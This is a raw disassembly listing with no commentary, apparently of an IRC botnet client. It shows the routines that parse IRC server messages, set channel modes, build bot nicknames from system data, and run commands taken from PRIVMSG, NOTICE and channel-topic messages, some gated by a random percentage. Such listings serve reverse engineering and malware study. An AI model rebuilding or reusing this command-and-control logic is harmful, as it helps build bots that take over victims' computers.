loc_40DB9A: ; CODE XREF: sub_40D871+314�j
call sub_408E8E
cmp eax, 400h
jbe short loc_40DBB3
call sub_408E8E
mov [ebp+var_7E4], eax
jmp short loc_40DBBD
; ---------------------------------------------------------------------------
loc_40DBB3: ; CODE XREF: sub_40D871+333�j
mov [ebp+var_7E4], 400h
loc_40DBBD: ; CODE XREF: sub_40D871+340�j
mov eax, [ebp+var_7E4]
shr eax, 0Ah
mov [ebp+var_36C], eax
call sub_408887
mov [ebp+var_2D0], eax
mov [ebp+var_368], offset aB ; "B"
cmp [ebp+var_2D0], 3E8h
jnb short loc_40DBF7
mov [ebp+var_368], offset aA_0 ; "A"
loc_40DBF7: ; CODE XREF: sub_40D871+37A�j
cmp [ebp+var_2D0], 1F4h
jnb short loc_40DC0D
mov [ebp+var_368], offset aG ; "G"
loc_40DC0D: ; CODE XREF: sub_40D871+390�j
and [ebp+var_370], 0
mov [ebp+var_364], 94h
push 24h
pop ecx
xor eax, eax
lea edi, [ebp+var_360]
rep stosd
lea eax, [ebp+var_364]
push eax
call ds:dword_417030 ; GetVersionExA
cmp [ebp+var_360], 5
jnz short loc_40DC54
cmp [ebp+var_35C], 1
jnz short loc_40DC54
mov [ebp+var_370], 1
loc_40DC54: ; CODE XREF: sub_40D871+3CE�j
; sub_40D871+3D7�j
push 5Ah
push 41h
call sub_4103F5
pop ecx
pop ecx
push eax
push 5Ah
push 41h
call sub_4103F5
pop ecx
pop ecx
push eax
cmp [ebp+var_370], 0
setz al
dec eax
and eax, 2Fh
add eax, 2Dh
movsx eax, al
push eax
push [ebp+var_368]
push [ebp+var_36C]
push 5Dh
push [ebp+var_2CC]
push 5Bh
push 5Dh
lea eax, [ebp+var_390]
push eax
push 5Bh
push offset aCSCCUCUSCCC ; "%c%s%c%c%u%c%u%s%c%c%c"
lea eax, [ebp+var_2C8]
push eax
call sub_416B5E ; sprintf
add esp, 34h
jmp short loc_40DCE5
; ---------------------------------------------------------------------------
loc_40DCB8: ; CODE XREF: sub_40D871+2FA�j
push offset dword_41DAA4
lea eax, [ebp+var_2C8]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_2C8]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_2C8]
push eax
call sub_40D7E5
pop ecx
loc_40DCE5: ; CODE XREF: sub_40D871+445�j
lea eax, [ebp+var_2C8]
push eax
push offset dword_419F04
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DCFD: ; CODE XREF: sub_40D871+2D0�j
push offset aError ; "ERROR"
mov eax, [ebp+arg_C]
push dword ptr [eax]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40DD25
push 0
push 0
push 0
call sub_40D366
add esp, 0Ch
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DD25: ; CODE XREF: sub_40D871+49F�j
push offset aJoin ; "JOIN"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40DD97
push offset byte_41EE48
push [ebp+arg_4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40DD97
mov eax, [ebp+arg_C]
cmp dword ptr [eax+8], 0
jz short loc_40DD97
mov eax, [ebp+arg_C]
mov eax, [eax+8]
movsx eax, byte ptr [eax]
cmp eax, 3Ah
jnz short loc_40DD74
mov eax, [ebp+arg_C]
mov eax, [eax+8]
inc eax
mov [ebp+var_7E8], eax
jmp short loc_40DD80
; ---------------------------------------------------------------------------
loc_40DD74: ; CODE XREF: sub_40D871+4F2�j
mov eax, [ebp+arg_C]
mov eax, [eax+8]
mov [ebp+var_7E8], eax
loc_40DD80: ; CODE XREF: sub_40D871+501�j
push [ebp+var_7E8]
push offset aModeSSmntu ; "MODE %s +smntu"
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DD97: ; CODE XREF: sub_40D871+4C8�j
; sub_40D871+4DB�j ...
push offset a001 ; "001"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz loc_40DE70
push 21h
mov eax, [ebp+arg_C]
push dword ptr [eax+8]
lea eax, [ebp+var_4B4]
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
lea eax, [ebp+var_4B4]
push eax
push offset byte_41EE48
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_4B4]
push eax
push offset aModeSXi ; "MODE %s +xi"
call sub_40D6CB
pop ecx
pop ecx
push offset dword_41ED48
push offset dword_41DAB4
push offset dword_419AD0
call sub_40D6CB
add esp, 0Ch
lea eax, [ebp+var_490]
push eax
call sub_40CF25
push eax
call sub_40449C
pop ecx
pop ecx
test eax, eax
jz short loc_40DE58
lea eax, [ebp+var_490]
push eax
call sub_4041B7
pop ecx
test eax, eax
jz short loc_40DE43
lea eax, [ebp+var_4B4]
push eax
push offset aUserhostS ; "USERHOST %s"
call sub_40D6CB
pop ecx
pop ecx
jmp short loc_40DE56
; ---------------------------------------------------------------------------
loc_40DE43: ; CODE XREF: sub_40D871+5BB�j
lea eax, [ebp+var_490]
push eax
push offset dword_41EF48
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40DE56: ; CODE XREF: sub_40D871+5D0�j
jmp short loc_40DE6B
; ---------------------------------------------------------------------------
loc_40DE58: ; CODE XREF: sub_40D871+5AA�j
lea eax, [ebp+var_4B4]
push eax
push offset aUserhostS ; "USERHOST %s"
call sub_40D6CB
pop ecx
pop ecx
loc_40DE6B: ; CODE XREF: sub_40D871:loc_40DE56�j
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DE70: ; CODE XREF: sub_40D871+53A�j
push offset a451 ; "451"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40DE96
push 0
push 1
call sub_40D043
pop ecx
pop ecx
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DE96: ; CODE XREF: sub_40D871+613�j
push offset a302 ; "302"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz loc_40DF3E
mov eax, [ebp+arg_C]
cmp dword ptr [eax+0Ch], 0
jnz short loc_40DEBE
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DEBE: ; CODE XREF: sub_40D871+646�j
push offset a@ ; "@"
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_5B8], eax
cmp [ebp+var_5B8], 0
jnz short loc_40DEE4
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DEE4: ; CODE XREF: sub_40D871+66C�j
push 100h
mov eax, [ebp+var_5B8]
inc eax
push eax
push offset dword_41EF48
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_5B4]
push eax
mov eax, [ebp+var_5B8]
inc eax
push eax
call sub_404612
pop ecx
pop ecx
movzx eax, al
test eax, eax
jnz short loc_40DF20
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DF20: ; CODE XREF: sub_40D871+6A8�j
push 100h
lea eax, [ebp+var_5B4]
push eax
push offset dword_41EF48
call sub_407A56
add esp, 0Ch
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DF3E: ; CODE XREF: sub_40D871+639�j
push offset aNick ; "NICK"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40DF8E
mov eax, [ebp+arg_C]
cmp dword ptr [eax+8], 0
jnz short loc_40DF62
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DF62: ; CODE XREF: sub_40D871+6EA�j
push offset byte_41EE48
push [ebp+arg_4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40DF89
mov eax, [ebp+arg_C]
mov eax, [eax+8]
inc eax
push eax
push offset byte_41EE48
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40DF89: ; CODE XREF: sub_40D871+702�j
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DF8E: ; CODE XREF: sub_40D871+6E1�j
push offset a332 ; "332"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz loc_40E128
mov eax, [ebp+arg_10]
cmp dword ptr [eax+10h], 0
jz short loc_40DFBF
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
movsx eax, byte ptr [eax+1]
test eax, eax
jnz short loc_40DFC4
loc_40DFBF: ; CODE XREF: sub_40D871+73E�j
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DFC4: ; CODE XREF: sub_40D871+74C�j
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
movsx eax, byte ptr [eax+1]
cmp eax, 3Dh
jnz loc_40E05F
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
inc eax
push eax
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
inc eax
inc eax
push eax
call sub_40E9C9
pop ecx
pop ecx
mov [ebp+var_5BC], eax
push [ebp+var_5BC]
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
inc eax
push eax
call sub_40F040
pop ecx
pop ecx
mov [ebp+var_5BC], eax
push [ebp+var_5BC]
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
inc eax
push eax
call sub_40EF41
pop ecx
pop ecx
mov eax, [ebp+arg_10]
cmp dword ptr [eax+14h], 0
jz short loc_40E04E
mov eax, [ebp+arg_10]
push dword ptr [eax+14h]
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
mov ecx, [ebp+var_5BC]
lea eax, [eax+ecx+1]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_40E05F
; ---------------------------------------------------------------------------
loc_40E04E: ; CODE XREF: sub_40D871+7BB�j
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
mov ecx, [ebp+var_5BC]
and byte ptr [eax+ecx+1], 0
loc_40E05F: ; CODE XREF: sub_40D871+760�j
; sub_40D871+7DB�j
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
movsx eax, byte ptr [eax+1]
test eax, eax
jz loc_40E123
lea eax, [ebp+var_7C4]
push eax
push offset asc_41A07C ; "]["
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
inc eax
push eax
call sub_40813C
add esp, 0Ch
mov [ebp+var_7C0], eax
and [ebp+var_7C8], 0
loc_40E09A: ; CODE XREF: sub_40D871+8AD�j
cmp [ebp+var_7C0], 0
jnz short loc_40E0A5
jmp short loc_40E123
; ---------------------------------------------------------------------------
loc_40E0A5: ; CODE XREF: sub_40D871+830�j
; sub_40D871+851�j
mov eax, [ebp+var_7C0]
movsx eax, byte ptr [eax]
cmp eax, 20h
jz short loc_40E0B5
jmp short loc_40E0C4
; ---------------------------------------------------------------------------
loc_40E0B5: ; CODE XREF: sub_40D871+840�j
mov eax, [ebp+var_7C0]
inc eax
mov [ebp+var_7C0], eax
jmp short loc_40E0A5
; ---------------------------------------------------------------------------
loc_40E0C4: ; CODE XREF: sub_40D871+842�j
push [ebp+var_7C0]
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
push offset aLinkLink@linkP ; "link!link@link PRIVMSG %s :%s"
push 200h
lea eax, [ebp+var_7BC]
push eax
call sub_416BAE ; _snprintf
add esp, 14h
lea eax, [ebp+var_7BC]
push eax
call sub_40E618
pop ecx
lea eax, [ebp+var_7C4]
push eax
push offset asc_41A07C ; "]["
push 0
call sub_40813C
add esp, 0Ch
mov [ebp+var_7C8], eax
mov eax, [ebp+var_7C8]
mov [ebp+var_7C0], eax
jmp loc_40E09A
; ---------------------------------------------------------------------------
loc_40E123: ; CODE XREF: sub_40D871+7FA�j
; sub_40D871+832�j
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40E128: ; CODE XREF: sub_40D871+731�j
cmp [ebp+arg_0], 0
jz short loc_40E153
mov eax, [ebp+arg_C]
cmp dword ptr [eax+8], 0
jz short loc_40E153
mov eax, [ebp+arg_C]
cmp dword ptr [eax+0Ch], 0
jz short loc_40E153
push offset byte_41EE48
push [ebp+arg_4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40E158
loc_40E153: ; CODE XREF: sub_40D871+8BB�j
; sub_40D871+8C4�j ...
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40E158: ; CODE XREF: sub_40D871+8E0�j
mov eax, [ebp+arg_C]
mov eax, [eax+0Ch]
inc eax
mov ecx, [ebp+arg_C]
mov [ecx+0Ch], eax
mov eax, [ebp+arg_10]
mov eax, [eax+0Ch]
inc eax
mov ecx, [ebp+arg_10]
mov [ecx+0Ch], eax
push offset aPrivmsg ; "PRIVMSG"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40E1C0
mov eax, [ebp+arg_C]
mov eax, [eax+0Ch]
movsx eax, byte ptr [eax]
cmp eax, 1
jnz short loc_40E1AB
mov eax, [ebp+arg_4]
mov [ebp+var_90], eax
mov [ebp+var_84], 3
jmp short loc_40E1BE
; ---------------------------------------------------------------------------
loc_40E1AB: ; CODE XREF: sub_40D871+923�j
mov eax, [ebp+arg_C]
mov eax, [eax+8]
mov [ebp+var_90], eax
and [ebp+var_84], 0
loc_40E1BE: ; CODE XREF: sub_40D871+938�j
jmp short loc_40E216
; ---------------------------------------------------------------------------
loc_40E1C0: ; CODE XREF: sub_40D871+915�j
push offset aNotice ; "NOTICE"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40E211
mov eax, [ebp+arg_C]
mov eax, [eax+0Ch]
movsx eax, byte ptr [eax]
cmp eax, 1
jnz short loc_40E1F9
mov eax, [ebp+arg_4]
mov [ebp+var_90], eax
mov [ebp+var_84], 3
jmp short loc_40E20F
; ---------------------------------------------------------------------------
loc_40E1F9: ; CODE XREF: sub_40D871+971�j
mov eax, [ebp+arg_C]
mov eax, [eax+8]
mov [ebp+var_90], eax
mov [ebp+var_84], 1
loc_40E20F: ; CODE XREF: sub_40D871+986�j
jmp short loc_40E216
; ---------------------------------------------------------------------------
loc_40E211: ; CODE XREF: sub_40D871+963�j
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40E216: ; CODE XREF: sub_40D871:loc_40E1BE�j
; sub_40D871:loc_40E20F�j
cmp [ebp+var_84], 3
jnz loc_40E321
mov eax, [ebp+arg_C]
mov eax, [eax+0Ch]
inc eax
mov ecx, [ebp+arg_C]
mov [ecx+0Ch], eax
mov eax, [ebp+arg_10]
mov eax, [eax+0Ch]
inc eax
mov ecx, [ebp+arg_10]
mov [ecx+0Ch], eax
and [ebp+var_7CC], 0
jmp short loc_40E253
; ---------------------------------------------------------------------------
loc_40E246: ; CODE XREF: sub_40D871:loc_40E31C�j
mov eax, [ebp+var_7CC]
inc eax
mov [ebp+var_7CC], eax
loc_40E253: ; CODE XREF: sub_40D871+9D3�j
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_C]
cmp dword ptr [ecx+eax*4], 0
jz short loc_40E26B
cmp [ebp+var_7CC], 0Fh
jnz short loc_40E2B8
loc_40E26B: ; CODE XREF: sub_40D871+9EF�j
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_10]
push dword ptr [ecx+eax*4]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_7D4], eax
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_C]
mov eax, [ecx+eax*4]
mov ecx, [ebp+var_7D4]
movsx eax, byte ptr [eax+ecx-1]
cmp eax, 1
jnz short loc_40E2B6
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_C]
mov eax, [ecx+eax*4]
mov ecx, [ebp+var_7D4]
mov byte ptr [eax+ecx-1], 1
loc_40E2B6: ; CODE XREF: sub_40D871+A2C�j
jmp short loc_40E321
; ---------------------------------------------------------------------------
loc_40E2B8: ; CODE XREF: sub_40D871+9F8�j
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_C]
push dword ptr [ecx+eax*4]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_7D0], eax
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_C]
mov eax, [ecx+eax*4]
mov ecx, [ebp+var_7D0]
movsx eax, byte ptr [eax+ecx-1]
cmp eax, 1
jnz short loc_40E31C
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_C]
mov eax, [ecx+eax*4]
mov ecx, [ebp+var_7D0]
and byte ptr [eax+ecx-1], 0
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_10]
mov eax, [ecx+eax*4]
mov ecx, [ebp+var_7D0]
and byte ptr [eax+ecx-1], 0
jmp short loc_40E321
; ---------------------------------------------------------------------------
loc_40E31C: ; CODE XREF: sub_40D871+A79�j
jmp loc_40E246
; ---------------------------------------------------------------------------
loc_40E321: ; CODE XREF: sub_40D871+9AC�j
; sub_40D871:loc_40E2B6�j ...
push offset byte_41EE48
push [ebp+var_90]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40E340
mov eax, [ebp+arg_4]
mov [ebp+var_90], eax
loc_40E340: ; CODE XREF: sub_40D871+AC4�j
push 7Ah
push 0
lea eax, [ebp+var_7C]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+arg_10]
mov eax, [eax]
mov [ebp+var_88], eax
and [ebp+var_8C], 0
mov eax, [ebp+arg_10]
push dword ptr [eax]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_80], eax
loc_40E370: ; CODE XREF: sub_40D871:loc_40E3F2�j
cmp [ebp+var_80], 3
jnb short loc_40E378
jmp short loc_40E3F7
; ---------------------------------------------------------------------------
loc_40E378: ; CODE XREF: sub_40D871+B03�j
mov eax, [ebp+var_88]
add eax, [ebp+var_80]
movsx eax, byte ptr [eax-1]
cmp eax, 20h
jnz short loc_40E393
mov eax, [ebp+var_80]
dec eax
mov [ebp+var_80], eax
jmp short loc_40E3F2
; ---------------------------------------------------------------------------
loc_40E393: ; CODE XREF: sub_40D871+B17�j
mov eax, [ebp+var_88]
add eax, [ebp+var_80]
movsx eax, byte ptr [eax-3]
cmp eax, 20h
jnz short loc_40E3F0
mov eax, [ebp+var_88]
add eax, [ebp+var_80]
movsx eax, byte ptr [eax-2]
cmp eax, 2Dh
jnz short loc_40E3F0
mov eax, [ebp+var_88]
add eax, [ebp+var_80]
movsx eax, byte ptr [eax-1]
cmp eax, 7Ah
jg short loc_40E3F0
mov [ebp+var_8C], 1
mov eax, [ebp+var_88]
add eax, [ebp+var_80]
movsx eax, byte ptr [eax-1]
mov [ebp+eax+var_7C], 1
mov eax, [ebp+var_80]
sub eax, 3
mov [ebp+var_80], eax
jmp short loc_40E3F2
; ---------------------------------------------------------------------------
loc_40E3F0: ; CODE XREF: sub_40D871+B32�j
; sub_40D871+B44�j ...
jmp short loc_40E3F7
; ---------------------------------------------------------------------------
loc_40E3F2: ; CODE XREF: sub_40D871+B20�j
; sub_40D871+B7D�j
jmp loc_40E370
; ---------------------------------------------------------------------------
loc_40E3F7: ; CODE XREF: sub_40D871+B05�j
; sub_40D871:loc_40E3F0�j
cmp [ebp+var_8C], 0
jz loc_40E4CC
and [ebp+var_7D8], 0
jmp short loc_40E41A
; ---------------------------------------------------------------------------
loc_40E40D: ; CODE XREF: sub_40D871:loc_40E4C7�j
mov eax, [ebp+var_7D8]
inc eax
mov [ebp+var_7D8], eax
loc_40E41A: ; CODE XREF: sub_40D871+B9A�j
cmp [ebp+var_7D8], 10h
jnb loc_40E4CC
mov eax, [ebp+var_7D8]
mov ecx, [ebp+arg_10]
cmp dword ptr [ecx+eax*4], 0
jnz short loc_40E43B
jmp loc_40E4CC
; ---------------------------------------------------------------------------
loc_40E43B: ; CODE XREF: sub_40D871+BC3�j
mov eax, [ebp+var_88]
add eax, [ebp+var_80]
mov ecx, [ebp+var_7D8]
mov edx, [ebp+arg_10]
cmp [edx+ecx*4], eax
jb short loc_40E4C7
cmp [ebp+var_8C], 0
jz short loc_40E48F
cmp [ebp+var_7D8], 0
jz short loc_40E488
mov eax, [ebp+var_7D8]
mov ecx, [ebp+arg_C]
push dword ptr [ecx+eax*4-4]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_7D8]
mov edx, [ebp+arg_10]
mov ecx, [edx+ecx*4-4]
and byte ptr [ecx+eax], 0
loc_40E488: ; CODE XREF: sub_40D871+BF1�j
and [ebp+var_8C], 0
loc_40E48F: ; CODE XREF: sub_40D871+BE8�j
mov eax, [ebp+var_7D8]
mov ecx, [ebp+arg_10]
mov eax, [ecx+eax*4]
and byte ptr [eax], 0
mov eax, [ebp+var_7D8]
mov ecx, [ebp+arg_C]
mov eax, [ecx+eax*4]
and byte ptr [eax], 0
mov eax, [ebp+var_7D8]
mov ecx, [ebp+arg_10]
and dword ptr [ecx+eax*4], 0
mov eax, [ebp+var_7D8]
mov ecx, [ebp+arg_C]
and dword ptr [ecx+eax*4], 0
loc_40E4C7: ; CODE XREF: sub_40D871+BDF�j
jmp loc_40E40D
; ---------------------------------------------------------------------------
loc_40E4CC: ; CODE XREF: sub_40D871+B8D�j
; sub_40D871+BB0�j ...
push offset byte_41EE48
mov eax, [ebp+arg_C]
push dword ptr [eax+8]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40E513
mov eax, [ebp+arg_10]
add eax, 0Ch
push eax
mov eax, [ebp+arg_C]
add eax, 0Ch
push eax
lea eax, [ebp+var_7C]
push eax
push [ebp+var_84]
push [ebp+var_90]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_40A9CF
add esp, 1Ch
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40E513: ; CODE XREF: sub_40D871+C6F�j
mov eax, [ebp+arg_C]
cmp dword ptr [eax+10h], 0
jnz short loc_40E521
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40E521: ; CODE XREF: sub_40D871+CA9�j
and [ebp+var_7DC], 0
push offset asc_41A070 ; "*"
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40E54A
mov [ebp+var_7DC], 1
jmp loc_40E5DE
; ---------------------------------------------------------------------------
loc_40E54A: ; CODE XREF: sub_40D871+CCB�j
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
push offset byte_41EE48
call sub_40A6EB
pop ecx
pop ecx
movzx eax, al
test eax, eax
jz short loc_40E56C
mov [ebp+var_7DC], 1
jmp short loc_40E5DE
; ---------------------------------------------------------------------------
loc_40E56C: ; CODE XREF: sub_40D871+CF0�j
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416B40 ; strlen
pop ecx
cmp eax, 4
ja short loc_40E5DE
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+arg_C]
mov ecx, [ecx+0Ch]
movsx eax, byte ptr [ecx+eax-1]
cmp eax, 25h
jnz short loc_40E5DE
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+arg_C]
mov ecx, [ecx+0Ch]
and byte ptr [ecx+eax-1], 0
call sub_410422
xor edx, edx
push 64h
pop ecx
div ecx
inc edx
mov [ebp+var_7E0], edx
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416B9C ; atoi
pop ecx
cmp eax, [ebp+var_7E0]
jl short loc_40E5DE
mov [ebp+var_7DC], 1
loc_40E5DE: ; CODE XREF: sub_40D871+CD4�j
; sub_40D871+CF9�j ...
movzx eax, [ebp+var_7DC]
test eax, eax
jz short loc_40E615
mov eax, [ebp+arg_10]
add eax, 10h
push eax
mov eax, [ebp+arg_C]
add eax, 10h
push eax
lea eax, [ebp+var_7C]
push eax
push [ebp+var_84]
push [ebp+var_90]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_40A9CF
add esp, 1Ch
loc_40E615: ; CODE XREF: sub_40D871+31�j
; sub_40D871+4C�j ...
pop edi
leave
retn
sub_40D871 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E618 proc near ; CODE XREF: sub_40C93C+A8�p
; sub_40D871+87F�p ...
var_1194 = dword ptr -1194h
var_1190 = dword ptr -1190h
var_118C = byte ptr -118Ch
var_1180 = dword ptr -1180h
var_114C = dword ptr -114Ch
var_1148 = dword ptr -1148h
var_1144 = dword ptr -1144h
var_113C = dword ptr -113Ch
var_1138 = dword ptr -1138h
var_1109 = byte ptr -1109h
var_1108 = byte ptr -1108h
var_1089 = byte ptr -1089h
var_1088 = byte ptr -1088h
var_88 = dword ptr -88h
var_84 = byte ptr -84h
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1194h
call sub_416BC0
and [ebp+var_4], 0
push 10h
lea eax, [ebp+var_118C]
push eax
lea eax, [ebp+var_1148]
push eax
lea eax, [ebp+var_1088]
push eax
push [ebp+arg_0]
call sub_407928
add esp, 14h
push offset a302 ; "302"
push [ebp+var_1144]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40E66D
mov dword_41E9AC, 1
jmp short loc_40E674
; ---------------------------------------------------------------------------
loc_40E66D: ; CODE XREF: sub_40E618+47�j
and dword_41E9AC, 0
loc_40E674: ; CODE XREF: sub_40E618+53�j
cmp [ebp+var_1148], 0
jz short loc_40E686
cmp [ebp+var_1144], 0
jnz short loc_40E68B
loc_40E686: ; CODE XREF: sub_40E618+63�j
jmp locret_40E941
; ---------------------------------------------------------------------------
loc_40E68B: ; CODE XREF: sub_40E618+6C�j
push offset aPrivmsg ; "PRIVMSG"
push [ebp+var_1144]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jz short loc_40E6BB
push offset aNotice ; "NOTICE"
push [ebp+var_1144]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz loc_40E7A5
loc_40E6BB: ; CODE XREF: sub_40E618+87�j
cmp [ebp+var_113C], 0
jz loc_40E7A5
cmp [ebp+var_1138], 0
jnz loc_40E7A5
mov eax, [ebp+var_113C]
movsx eax, byte ptr [eax]
cmp eax, 3Ah
jnz loc_40E7A5
mov eax, [ebp+var_113C]
movsx eax, byte ptr [eax+1]
cmp eax, 3Dh
jnz loc_40E7A5
mov eax, [ebp+var_113C]
movsx eax, byte ptr [eax+2]
test eax, eax
jz loc_40E7A5
mov eax, [ebp+var_113C]
inc eax
inc eax
push eax
call sub_40EC96
pop ecx
test eax, eax
jz loc_40E7A5
mov eax, [ebp+var_113C]
inc eax
push eax
mov eax, [ebp+var_113C]
inc eax
inc eax
push eax
call sub_40E9C9
pop ecx
pop ecx
mov [ebp+var_1190], eax
push [ebp+var_1190]
mov eax, [ebp+var_113C]
inc eax
push eax
call sub_40F040
pop ecx
pop ecx
mov [ebp+var_1190], eax
push [ebp+var_1190]
mov eax, [ebp+var_113C]
inc eax
push eax
call sub_40EF41
pop ecx
pop ecx
mov eax, [ebp+var_113C]
add eax, [ebp+var_1190]
and byte ptr [eax+1], 0
push 0Dh
lea eax, [ebp+var_1180]
push eax
lea eax, [ebp+var_113C]
push eax
push [ebp+var_1180]
push [ebp+var_113C]
call sub_407928
add esp, 14h
loc_40E7A5: ; CODE XREF: sub_40E618+9D�j
; sub_40E618+AA�j ...
push offset aLinkLink@link ; "link!link@link"
push [ebp+var_1148]
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jz loc_40E853
and [ebp+var_1194], 0
jmp short loc_40E7D5
; ---------------------------------------------------------------------------
loc_40E7C8: ; CODE XREF: sub_40E618+234�j
mov eax, [ebp+var_1194]
inc eax
mov [ebp+var_1194], eax
loc_40E7D5: ; CODE XREF: sub_40E618+1AE�j
mov eax, [ebp+var_1194]
cmp off_41DA5C[eax*4], 0
jnz short loc_40E7E7
jmp short loc_40E851
; ---------------------------------------------------------------------------
loc_40E7E7: ; CODE XREF: sub_40E618+1CB�j
mov eax, [ebp+var_1194]
push off_41DA5C[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_1194]
push off_41DA5C[eax*4]
mov eax, [ebp+var_1148]
inc eax
push eax
call sub_40A5BE
pop ecx
pop ecx
movzx eax, al
test eax, eax
jz short loc_40E839
mov eax, [ebp+var_1194]
push off_41DA5C[eax*4]
call sub_4105AD
pop ecx
mov [ebp+var_4], 1
jmp short loc_40E851
; ---------------------------------------------------------------------------
loc_40E839: ; CODE XREF: sub_40E618+203�j
mov eax, [ebp+var_1194]
push off_41DA5C[eax*4]
call sub_4105AD
pop ecx
jmp loc_40E7C8
; ---------------------------------------------------------------------------
loc_40E851: ; CODE XREF: sub_40E618+1CD�j
; sub_40E618+21F�j
jmp short loc_40E85A
; ---------------------------------------------------------------------------
loc_40E853: ; CODE XREF: sub_40E618+1A1�j
mov [ebp+var_4], 1
loc_40E85A: ; CODE XREF: sub_40E618:loc_40E851�j
and [ebp+var_88], 0
mov [ebp+var_114C], 1
jmp short loc_40E87A
; ---------------------------------------------------------------------------
loc_40E86D: ; CODE XREF: sub_40E618:loc_40E90A�j
mov eax, [ebp+var_114C]
inc eax
mov [ebp+var_114C], eax
